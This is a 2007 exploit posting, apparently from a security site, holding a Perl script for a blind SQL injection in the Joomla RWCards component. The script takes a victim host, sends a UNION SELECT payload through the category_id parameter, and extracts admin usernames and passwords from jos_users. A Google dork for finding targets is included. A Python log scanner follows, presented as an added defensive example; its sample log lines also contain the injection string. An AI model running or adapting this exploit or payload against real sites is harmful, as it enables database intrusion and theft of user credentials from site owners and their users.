



2007-03-24 Joomla Component RWCards <= 2.4.3 Remote SQL Injection Exploit
Rated as : Moderate Risk

#!/usr/bin/perl
#[Script Name: Joomla Component RWCards <= 2.4.3 Remote Blind SQL Injection Exploit
#[Coded by   : ajann
#[Author     : ajann
#[Dork       : "index.php?option=com_rwcards"
#[Contact    : :(
#[S.Page     : http://www.weberr.de
#[$$         : Free
#[..         : ajann,Turkey

use IO::Socket;
if(@ARGV < 1){
print "
[========================================================================
[//  Joomla Component RWCards <= 2.4.3 Remote Blind SQL Injection Exploit
[//                   Usage: exploit.pl [target]
[//                   Example: exploit.pl victim.com
[//                   Example: exploit.pl victim.com
[//                           Vuln&Exp : ajann
[========================================================================
";
exit();
}
#Local variables
$server = $ARGV[0];
$server =~ s/(http:\/\/)//eg;
$host = "http://".$server;
$port = "80";
$file =
"/index.php?option=com_rwcards&task=listCards&category_id=";

print "Script <DIR> : ";
$dir = <STDIN>;
chop ($dir);

if ($dir =~ /exit/){
print "-- Exploit Failed[You Are Exited] \n";
exit();
}

if ($dir =~ /\//){}
else {
print "-- Exploit Failed[No DIR] \n";
exit();
 }


$target =
"-1'union%20select%201,2,03,4,concat(char(117,115,101,114,110,97,109,101,58),username,char(112,97,115,115,119,111,114,100,58),password),50,044,076,0678,07%20from%20jos_users/*";
$target = $host.$dir.$file.$target;

#Writing data to socket
print
"+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr
=> "$server", PeerPort => "$port") || die
"\n+ Connection failed...\n";
print $socket "GET $target HTTP/1.1\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "+ Connected!...\n";
#Getting
while($answer = <$socket>) {
if ($answer =~ /username:(.*?)pass/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Username: $1\n";
}

if ($answer =~ /password:(.*?)\">/){
print "+ Password: $1\n";
}

if ($answer =~ /Syntax error/) { 
print "+ Exploit Failed : ( \n";
print
"+**********************************************************************+\n";
exit(); 
}

if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : (  \n";
print
"+**********************************************************************+\n";
exit(); 
}
 }
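
For defenders, the request built by the script above stands out in web server logs: it is a com_rwcards request whose category_id is not a plain integer. The Python below is an added example, not part of the original posting; the Apache "combined" log format, the sample log lines and all function names are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request portion of an Apache/nginx "combined" access-log entry (assumed format).
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?:GET|POST|HEAD) (?P<url>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# SQL tokens that appear in the request built by the script above.
SQL_TOKENS = re.compile(r"union\s+(?:all\s+)?select|concat\s*\(|jos_users|/\*|'", re.I)

def inspect_line(line):
    """Return a finding for a com_rwcards request whose category_id is not an integer."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    # parse_qs URL-decodes each value (%20 and + both become a space).
    query = parse_qs(urlsplit(m["url"]).query, keep_blank_values=True)
    if "com_rwcards" not in query.get("option", []):
        return None
    for value in query.get("category_id", []):
        if re.fullmatch(r"[0-9]+", value):
            continue  # plain numeric id, as sent by normal browsing
        kind = "sqli" if SQL_TOKENS.search(value) else "non-numeric"
        return {"ip": m["ip"], "status": int(m["status"]), "kind": kind, "value": value}
    return None

def scan(lines):
    """Inspect every log line and return the findings in log order."""
    return [f for f in map(inspect_line, lines) if f]

# Constructed sample log lines (documentation IP ranges), not from a real server.
SAMPLE_LOG = [
    '192.0.2.10 - - [24/Mar/2007:10:00:01 +0000] "GET /index.php?option=com_rwcards'
    '&task=listCards&category_id=3 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [24/Mar/2007:10:02:13 +0000] "GET /joomla/index.php?option=com_rwcards'
    "&task=listCards&category_id=-1'union%20select%201,2%20from%20jos_users/*"
    ' HTTP/1.1" 200 7301',
    '192.0.2.11 - - [24/Mar/2007:10:03:40 +0000] "GET /index.php?option=com_content'
    '&id=5 HTTP/1.1" 200 2048',
    '203.0.113.5 - - [24/Mar/2007:10:04:02 +0000] "GET /index.php?option=com_rwcards'
    '&task=listCards&category_id=abc HTTP/1.1" 500 310',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A "non-numeric" finding is only an anomaly worth a look; a "sqli" finding with a 200 status means the response should be reviewed for leaked jos_users data and the stored credentials treated as exposed.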


securitydot.net - 2007-03-24
